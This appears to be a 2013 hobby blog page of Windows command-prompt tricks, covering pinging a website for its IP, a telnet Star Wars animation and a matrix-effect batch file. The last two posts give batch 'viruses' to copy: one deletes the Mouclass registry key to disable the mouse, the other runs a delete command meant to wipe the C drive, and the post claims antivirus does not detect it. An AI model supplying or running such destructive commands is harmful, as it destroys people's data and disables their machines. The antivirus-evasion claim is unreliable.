Thursday, April 25, 2013
Finding Ip Address Of A Website Using Command Prompt Or CMD
In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.
How to find IP ?
1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.
3. It will take less then a second and come up with the results as shown below.
In my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.
Labels:
IP Address
Watch Star Wars Movie In CMD
This is very intersting and amazing command prompt trick which will play star wars movie in the command prompt or cmd. Below are complete steps with screen shots for this trick with. Without wasting time lets gets started.
1. Go to start > Run and type in cmd and press enter
2. Now type in telnet as shown below and press enter.
3. After that enter o as shown below and press enter.
4. Next enter towel.blinkenlights.nl as shown below and press enter.
5. Now star wars movie will start playing on your command prompt
Labels:
CMD
Learn Batch Programming (Video Tutorials)
Batch File programming is really really easy then any other programming language. You could do cool stuffs with batch file. I had previously posted about Matrix effect and Mouse virus which are created using batch file programming. I came across batch file programming videos on youtube so i am sharing with you all. It will hardly take your 30 minutes and you will learn a new language. This are 3 begineers videos if you like it i will find more for you guys. So lets get started learning batch programming.
Introduction To Batch Files
Part 2
Matrix Effect Using Notepad
This is amazing notepad trick which will display matrix effect like you might have seen in movies, that is numbers flashes in green colour. Basically we will be creating a small batch file in notepad.
Go to Notepad and copy below codes
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Save this file as matrix.bat
Now open this file as see matrix effect on your screen.
Wednesday, April 24, 2013
Make A Virus That Disable Mouse
I had previously posted on making different batch file like matrix effect,opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouseso think before trying it on yourself.
Open Notepad and copy below codes :
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Save this file as virus.bat
Done you just created your virus.
Learn To Make Dangerous Virus In A Minute
In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.
What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.
How to Make the virus ?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Subscribe to:
Posts (Atom)












